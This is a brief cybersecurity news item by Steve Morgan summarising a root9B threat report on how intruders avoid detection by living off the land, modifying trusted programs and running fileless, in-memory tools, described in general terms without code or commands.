Report: Hackers conduct cyberintrusions without malware
Steve Morgan
Founder at Cybersecurity Ventures, Editor-in-Chief at Cybercrime Magazine. and Executive Producer at Cybercrime Radio.
Adversaries are constantly improving their tradecraft and modifying cyber tactics, techniques, and procedures to avoid detection, according to the Threat Defiance Report from root9B.
Hackers create malware to look like legitimate programs or libraries, often modifying existing trusted programs and libraries to add a small malicious component, or using trusted programs to execute malicious scripts.
Many modern adversaries conduct intrusions without any malicious software at all; using legitimate programs to “live off the land” – accessing your systems in the same manner as administrators and users.
Advanced adversaries frequently deploy such mechanisms or employ only small disposable tools for initial access to determine the security solutions you have deployed. This provides the adversary with valuable information so they can tailor follow-on actions to avoid detection by your static solutions. These toolkits often reside entirely in memory; avoidcreating any files that could be detected (fileless malware).